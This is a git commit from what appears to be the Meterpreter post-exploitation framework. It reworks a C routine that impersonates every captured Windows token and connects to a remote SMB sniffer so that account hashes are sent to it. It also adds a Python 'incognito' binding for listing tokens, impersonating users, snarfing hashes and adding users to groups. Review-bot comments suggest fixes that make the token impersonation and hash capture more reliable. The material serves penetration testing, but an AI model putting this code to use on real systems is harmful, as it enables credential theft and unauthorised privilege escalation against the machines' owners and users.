
Add incognito binding, code tidies

This commit is contained in:
OJ 2015-11-03 17:52:06 +10:00
parent cbb50227a5
commit e016e6d526
4 changed files with 113 additions and 20 deletions


@ -48,26 +48,29 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
}
// Use every token and get hashes by connecting to SMB sniffer
for (i=0;i<num_tokens;i++)
if (token_list[i].token)
for (i = 0; i < num_tokens; i++)
{
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
// If token is not "useless" local account connect to sniffer
if (_stricmp(domain_name, "NT AUTHORITY"))
if (token_list[i].token)
{
// Impersonate token
ImpersonateLoggedOnUser(token_list[i].token);
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
// Connect to smb sniffer
if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
// If token is not "useless" local account connect to sniffer
if (_stricmp(domain_name, "NT AUTHORITY"))
{
// Impersonate token
ImpersonateLoggedOnUser(token_list[i].token);
// Revert to primary token
RevertToSelf();
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
// Connect to smb sniffer
if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
{
// Revert to primary token
RevertToSelf();
}
}
CloseHandle(token_list[i].token);
}
CloseHandle(token_list[i].token);
}
packet_transmit_response(ERROR_SUCCESS, remote, response);
@ -77,7 +80,9 @@ cleanup:
// Restore token impersonation
if (saved_token != INVALID_HANDLE_VALUE)
{
ImpersonateLoggedOnUser(saved_token);
}
return ERROR_SUCCESS;
}
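Review bot: On the new side the impersonation is only undone when `WNetAddConnection2A` returns NO_ERROR (the `if (!WNetAddConnection2A(...)) { RevertToSelf(); }` branch), so a failed connection leaves the thread impersonating that token, and when that was the last token and `saved_token` is INVALID_HANDLE_VALUE the cleanup block in the second hunk never calls `RevertToSelf()`, leaving the server thread running under a foreign token after the request completes. The revert should be unconditional: `WNetAddConnection2A(&nr, NULL, NULL, 0);` followed by `RevertToSelf();`, dropping the `if`. The return value of `ImpersonateLoggedOnUser` is also unchecked, so a failed impersonation sends whatever token the thread already holds to the sniffer and the captured hash is attributed to the wrong account; guard it with `if (!ImpersonateLoggedOnUser(token_list[i].token)) { CloseHandle(token_list[i].token); continue; }`. Because this rendering drops the +/- markers I cannot tell whether the `RevertToSelf()` printed directly after the impersonation, before the cancel/connect calls, is a removed line or survives in the new code; if it survives, the connection is made under the primary token and no hash is captured for that identity. request_incognito_snarf_hashes starts before the first hunk.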


@ -1,2 +1,2 @@
__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi']
__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito']


@ -0,0 +1,77 @@
import meterpreter_bindings
from meterpreter.core import *
from meterpreter.tlv import *
INCOGNITO_NO_TOKENS = 'No tokens available\n'
def list_user_tokens():
return __list_tokens_internal(0)
def list_group_tokens():
return __list_tokens_internal(1)
def __list_tokens_internal(order):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER, order)
resp = invoke_meterpreter('incognito_list_tokens', True, tlv)
if resp == None:
return None
if packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] != 0:
return None
delegation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION)['value']
impersonation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)['value']
return {
'Impersonation': impersonation.strip().split('\n') if impersonation != INCOGNITO_NO_TOKENS else [],
'Delegation': delegation.strip().split('\n') if delegation != INCOGNITO_NO_TOKENS else []
}
def impersonate(user):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, user)
resp = invoke_meterpreter('incognito_impersonate_token', True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
def snarf_hashes(server):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
resp = invoke_meterpreter('incognito_snarf_hashes', True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
def add_user(server, username, password):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
tlv += tlv_pack(TLV_TYPE_INCOGNITO_PASSWORD, password)
resp = invoke_meterpreter('incognito_add_user', True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
def add_group_user(server, group, username):
return __add_group_user_internal('incognito_add_group_user', server, group, username)
def add_localgroup_user(server, group, username):
return __add_group_user_internal('incognito_add_localgroup_user', server, group, username)
def __add_group_user_internal(msg, server, group, username):
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
tlv += tlv_pack(TLV_TYPE_INCOGNITO_GROUPNAME, group)
resp = invoke_meterpreter(msg, True, tlv)
if resp == None:
return False
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
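Review bot: In `__list_tokens_internal` the two token strings are split with `strip().split('\n')` whenever they differ from the exact sentinel `'No tokens available\n'`, so an empty string, or the sentinel with different trailing whitespace, yields `['']` — a one-element list holding an empty name that a caller may then pass straight to `impersonate`. A helper that strips first and tests for emptiness avoids this: `def _split_tokens(text): text = text.strip(); return [] if not text or text == INCOGNITO_NO_TOKENS.strip() else text.split('\n')`. Separately, every `resp == None` should be `resp is None`, and the module-level `__list_tokens_internal` / `__add_group_user_internal` would conventionally take a single leading underscore, since double underscores only mangle inside classes. `invoke_meterpreter` and `packet_get_tlv` are not visible here, so whether an empty value can actually come back from the server is an assumption drawn from the string handling alone.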


@ -1,8 +1,9 @@
from meterpreter.core import *
TLV_STDAPI_EXTENSION = 0
TLV_PRIV_EXTENSION = 20000
TLV_KIWI_EXTENSION = 20000
TLV_STDAPI_EXTENSION = 0
TLV_INCOGNITO_EXTENSION = 20000
TLV_PRIV_EXTENSION = 20000
TLV_KIWI_EXTENSION = 20000
# Stdapi constants
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
@ -45,4 +46,14 @@ TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_KIWI_EXTENSION +
TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 8)
TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 9)
# Incognito constants
TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 2)
TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 3)
TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER = TLV_META_TYPE_UINT | (TLV_INCOGNITO_EXTENSION + 4)
TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 5)
TLV_TYPE_INCOGNITO_GENERIC_RESPONSE = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 6)
TLV_TYPE_INCOGNITO_USERNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 7)
TLV_TYPE_INCOGNITO_PASSWORD = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 8)
TLV_TYPE_INCOGNITO_SERVERNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 9)
TLV_TYPE_INCOGNITO_GROUPNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 10)
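Review bot: `TLV_INCOGNITO_EXTENSION`, `TLV_PRIV_EXTENSION` and `TLV_KIWI_EXTENSION` all equal 20000, so the new `TLV_TYPE_INCOGNITO_PASSWORD` (STRING | 20008) and `TLV_TYPE_INCOGNITO_SERVERNAME` (STRING | 20009) are numerically identical to `TLV_TYPE_KIWI_PWD_LMHASH` and `TLV_TYPE_KIWI_PWD_NTLMHASH` defined a few lines above. That is presumably harmless as long as each constant is only read from the response of its own command — which is how the per-extension numbering on the C side likely works — but `packet_get_tlv` cannot tell them apart, so nothing generic may key on these values. A comment next to the base constants would stop the next reader from assuming global uniqueness: `# All extension bases are 20000: a TLV id is only unique within one extension's command/response; never compare ids across extensions.` The first hunk prints old and new lines without markers, so I cannot tell whether the repeated `TLV_STDAPI_EXTENSION = 0` is a removed line or a leftover duplicate on the new side.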